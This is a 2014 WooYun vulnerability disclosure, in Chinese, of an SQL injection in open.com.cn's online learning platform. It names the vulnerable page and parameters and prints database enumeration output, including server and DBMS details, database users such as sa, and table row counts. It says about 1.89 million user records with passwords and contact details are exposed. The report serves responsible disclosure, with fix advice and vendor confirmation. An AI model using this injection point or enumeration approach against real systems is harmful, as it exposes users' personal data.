当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-076781

漏洞标题:OPEN.COM.CN SQL注入(一)

相关厂商:open.com.cn

漏洞作者: Feei

提交时间:2014-09-21 10:49

修复时间:2014-11-05 10:50

公开时间:2014-11-05 10:50

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-09-21: 细节已通知厂商并且等待厂商处理中
2014-09-26: 厂商已经确认,细节仅向厂商公开
2014-10-06: 细节向核心白帽子及相关领域专家公开
2014-10-16: 细节向普通白帽子公开
2014-10-26: 细节向实习白帽子公开
2014-11-05: 细节向公众公开

简要描述:

过滤不严导致SQL注入,189万用户信息泄露

详细说明:

注入点(需登陆):
http://learn.open.com.cn/Inquiry/View.aspx?QueryID=534&ResourceType=R1&ResourceCode=23859035-DD61-4C02-AB27-59190ABBC524
先登陆http://learn.open.com.cn/
登陆后

QQ20140920-1.png


注入点检测

3A85AECD-C6AB-4209-AA5D-8B54AE5EBD16.png


服务器与DB信息
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2005
database management system users [2]:
[*] lms
[*] sa
共有189万用户信息存在被泄露风险,而且通过关联表可以查出这些用户在读的专业以及地址等更加详细的信息,这些信息如果泄露将有很大危害!

漏洞证明:

数据库
[*] Lms
[*] master
[*] model
[*] msdb
[*] tempdb
Database: Lms
+-----------------------------------------------------+---------+
| Table | Entries |
+-----------------------------------------------------+---------+
| dbo.tb_r_InfoClickRecord | 43599317 |
| dbo.tb_r_StudentCourse | 27612911 |
| dbo.vw_StudentCourse | 27612904 |
| dbo.online_r_StudentExercise | 25522113 |
| dbo.OES_StudentExercise | 25522085 |
| dbo.v_Goods_InValidSelectCourse | 21969812 |
| dbo.vw_PassStudyStudentCourse | 21797450 |
| dbo.vw_PassStudyStudentMasterCourse | 21797450 |
| dbo.vw_PassStudyStudentSlaveCourse | 21796172 |
| dbo.Online_r_HomeWorkResult | 19464208 |
| dbo.Online_r_HomeWorkFinish | 16964515 |
| dbo.sco_Cmi_Core | 15088486 |
| dbo.tb_r_studentcourse_ForDel | 10695086 |
| dbo.tb_r_ReceiveMessage | 10478476 |
| dbo.online_r_StudentExercise_del | 7751195 |
| dbo.vw_MasterCourseUniversityLcenter | 7603003 |
| dbo.tb_e_UserLog | 7532440 |
| dbo.vw_InStudyStudentMasterCourse | 5641814 |
| dbo.v_Goods_ValidSelectCourse | 5641619 |
| dbo.vw_InStudyStudentCourse | 5634245 |
| dbo.vw_InOrPassStudyStudentSlaveCourse | 5634043 |
| dbo.vw_InStudyStudentSlaveCourse | 5634043 |
| dbo.tb_r_QueryResult | 4688141 |
| dbo.online_e_TestPaperDetail | 3876609 |
| dbo.tb_r_StudentJobRecordLog_new20120827 | 3196753 |
| dbo.tb_r_StudentJobRecord | 3127671 |
| dbo.evaluation_e_Result | 2446320 |
| dbo.temporary_e_Inquiry | 2313124 |
| dbo.tb_r_StudentJobRecordLog | 2248387 |
| dbo.tb_r_StudentCourseClick | 2072514 |
| dbo.Online_r_HomeWork | 1987674 |
| dbo.sco_UserObjectives | 1923408 |
| dbo.tb_e_UserInfo | 1894167 | 用户信息 189万
| dbo.FI_UserInfo | 1894163 |
| dbo.v_ValidUserInfo | 1893574 |
| dbo.tb_e_StudentBaseInfo | 1881696 |
| dbo.tip_e_ActionLog | 1855706 |
| dbo.OES_StudentJobScore | 1804964 |
| dbo.[user] | 1795621 |
| dbo.tb_e_StudentSchoolInfo | 1688146 |
| dbo.vw_tb_e_UserInfo | 1656116 |
| dbo.vw_ValidStudentSchoolRelativeInfo | 1656100 |
| dbo.vw_ValidStudentBaseInfo | 1592285 |
| dbo.vw_ValidStudentInfo | 1592285 |
| dbo.online_r_HomeworkResultDetail | 1557254 |
| dbo.LearningBar_e_UserAction | 1266086 |
| dbo.CSVTable | 1155063 |
用户信息:包括用户名、密码、手机、QQ、邮箱、公司、真实姓名等信息

EBDF4A07-5158-4B0E-9104-06DE71996925.png


管理员账号信息:

7EBEF3EC-AC1F-4E75-B95E-BF533C7C3165.png


修复方案:

严格过滤参数
目测没有做全局过滤,建议直接先上WAF

版权声明:转载请注明来源 Feei@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:18

确认时间:2014-09-26 08:15

厂商回复:

研发人员更替,规范性差

最新状态:

暂无